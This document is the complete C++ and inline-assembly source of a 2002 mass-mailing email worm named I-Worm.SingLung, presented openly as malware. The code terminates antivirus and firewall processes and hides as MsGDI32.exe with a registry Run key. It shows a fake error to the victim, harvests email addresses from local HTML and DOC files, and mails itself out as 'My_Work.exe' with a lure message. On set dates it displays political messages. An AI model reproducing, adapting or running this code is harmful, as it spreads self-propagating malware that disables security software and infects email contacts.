/* Name : I-Worm.SingLung Author : PetiK Date : January 23rd 2002 - January 26th 2002 Language : C++/Win32asm Greetz to Bumblebee (I-Worm.Plage and I-Worm.Rundll); */ #include <stdio.h> #include <windows.h> #include <mapi.h> #include <tlhelp32.h> #pragma argused #pragma inline char filename[100],sysdir[100],sysdr[100],winhtm[100]; LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run", SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"; int i; HANDLE fd,lSnapshot,myproc; BOOL rProcessFound; BYTE desktop[50],favoris[50],personal[50],cache[50]; DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris), sizpersonal=sizeof(personal),sizdesktop=sizeof(cache); DWORD type=REG_SZ; FILE *stopv; LHANDLE session; MapiMessage mess; MapiRecipDesc from; HINSTANCE hMAPI; HKEY hReg; PROCESSENTRY32 uProcess; SYSTEMTIME systime; WIN32_FIND_DATA ffile; HDC dc; void Welcome(); void StopAV(char *); void FindFile(char *,char *); void GetMail(char *,char *); void sendmail(char *); void FeedBack(); //ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG); ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) { /* // Worm in RegisterServiceProcess HMODULE kern32=GetModuleHandle("KERNEL32.DLL"); if(kern32) { (FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess"); if(RegSerPro) RegSerPro(NULL,1); } */ // Fuck some AntiVirus hahahaha StopAV("AVP32.EXE"); // AVP StopAV("AVPCC.EXE"); // AVP StopAV("AVPM.EXE"); // AVP StopAV("WFINDV32.EXE"); // Dr. Solomon StopAV("F-AGNT95.EXE"); // F-Secure StopAV("NAVAPW32.EXE"); // Norton Antivirus StopAV("NAVW32.EXE"); // Norton Antivirus StopAV("NMAIN.EXE"); // Norton Antivirus StopAV("PAVSCHED.EXE"); // Panda AntiVirus StopAV("ZONEALARM.EXE"); // ZoneAlarm GetModuleFileName(hInst,filename,100); GetSystemDirectory((char *)sysdir,100); strcpy(sysdr,sysdir); strcat(sysdr,"\\MSGDI32.EXE"); if((lstrcmp(filename,sysdr))!=0) { Welcome(); } else { hMAPI=LoadLibrary("MAPI32.DLL"); (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop); RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris); RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal); RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache); RegCloseKey(hReg); GetWindowsDirectory((char *)winhtm,100); _asm { call @wininet db "WININET.DLL",0 @wininet: call LoadLibrary test eax,eax jz end_asm mov ebp,eax call @inetconnect db "InternetGetConnectedState",0 @inetconnect: push ebp call GetProcAddress test eax,eax jz end_wininet mov edi,eax verf: push 0 push Tmp call edi dec eax jnz verf end_wininet: push ebp call FreeLibrary end_asm: jmp end_all_asm Tmp dd 0 end_all_asm: } FindFile(desktop,"*.htm"); FindFile(favoris,"*.ht*"); FindFile(personal,"*.ht*"); FindFile(personal,"*.doc"); FindFile(winhtm,".ht*"); FindFile(cache,".ht*"); FreeLibrary(hMAPI); FeedBack(); } strcat(sysdir,"\\MsGDI32.exe"); CopyFile(filename,sysdir,FALSE); RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg); RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100); RegCloseKey(hReg); } void Welcome() { register char fileWel[100],messWel[25],titWel[25]; strcpy(fileWel,filename); fileWel[0]=0; for(i=strlen(filename);i>0 && filename[i]!='\\';i--); wsprintf(titWel,"Error - %s",fileWel+i+1); wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1); MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND); } void StopAV(char *antivirus) { register BOOL term; lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); uProcess.dwSize=sizeof(uProcess); rProcessFound=Process32First(lSnapshot,&uProcess); while(rProcessFound) { if(strstr(uProcess.szExeFile,antivirus)!=NULL) { // Norton Antivirus myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } rProcessFound=Process32Next(lSnapshot,&uProcess); } CloseHandle(lSnapshot); } void FindFile(char *folder, char *ext) { register bool abc=TRUE; register HANDLE hFile; char mail[128]; SetCurrentDirectory(folder); hFile=FindFirstFile(ext,&ffile); if(hFile!=INVALID_HANDLE_VALUE) { while(abc) { SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE); GetMail(ffile.cFileName,mail); if(strlen(mail)>0) { WritePrivateProfileString("EMail found",mail,"send","singlung.txt"); sendmail(mail); } abc=FindNextFile(hFile,&ffile); } } } void GetMail(char *namefile, char *mail) { HANDLE hf,hf2; char *mapped; DWORD size,i,k; BOOL test=FALSE,valid=FALSE; mail[0]=0; hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0); if(hf==INVALID_HANDLE_VALUE) return; size=GetFileSize(hf,NULL); if(!size) return; if(size<8) return; size-=100; hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0); if(!hf2) { CloseHandle(hf); return; } mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0); if(!mapped) { CloseHandle(hf2); CloseHandle(hf); return; } i=0; while(i<size && !test) { if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) { test=TRUE; i+=strlen("mailto:"); k=0; while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) { if(mapped[i]!=' ') { mail[k]=mapped[i]; k++; if(mapped[i]=='@') valid=TRUE; } i++; } mail[k]=0; } else i++; } if(!valid) mail[0]=0; UnmapViewOfFile(mapped); CloseHandle(hf2); CloseHandle(hf); return; } void sendmail(char *tos) { memset(&mess,0,sizeof(MapiMessage)); memset(&from,0,sizeof(MapiRecipDesc)); from.lpszName=NULL; from.ulRecipClass=MAPI_ORIG; mess.lpszSubject="Secret for you..."; mess.lpszNoteText="Hi Friend,\n\n" "I send you my last work.\n" "Mail me if you have some suggests.\n\n" " See you soon. Best Regards."; mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc)); if(!mess.lpRecips) return; memset(mess.lpRecips,0,sizeof(MapiRecipDesc)); mess.lpRecips->lpszName=tos; mess.lpRecips->lpszAddress=tos; mess.lpRecips->ulRecipClass=MAPI_TO; mess.nRecipCount=1; mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); if(!mess.lpFiles) return; memset(mess.lpFiles,0,sizeof(MapiFileDesc)); mess.lpFiles->lpszPathName=filename; mess.lpFiles->lpszFileName="My_Work.exe"; mess.nFileCount=1; mess.lpOriginator=&from; mSendMail(0,0,&mess,0,0); free(mess.lpRecips); free(mess.lpFiles); } void FeedBack() { GetSystemTime(&systime); switch(systime.wDay) { case 7: MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n" "With this, you stop the life of women and children.", "Message to USA",MB_OK|MB_ICONHAND); break; case 11: dc=GetDC(NULL); if(dc) { TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50); } ReleaseDC(NULL,dc); break; case 28: stopv=fopen("StopIntifada.htm","w"); fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and Israeli</title></head>\n"); fprintf(stopv,"<body bgcolor=blue text=yellow>\n"); fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE VIOLENCE</font></p><BR>\n"); fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n"); fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous city.</font><BR>\n"); fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb attack.</font><BR>\n"); fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist groups.</font><BR><BR>\n"); fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n"); fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n"); fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n"); fprintf(stopv,"<font>-THE BOTH:</font><BR>\n"); fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n"); fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT !</font><BR><BR>\n"); fprintf(stopv,"<font>Thanx to read this.</font></p>\n"); fprintf(stopv,"</body></html>"); fclose(stopv); ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED); break; } }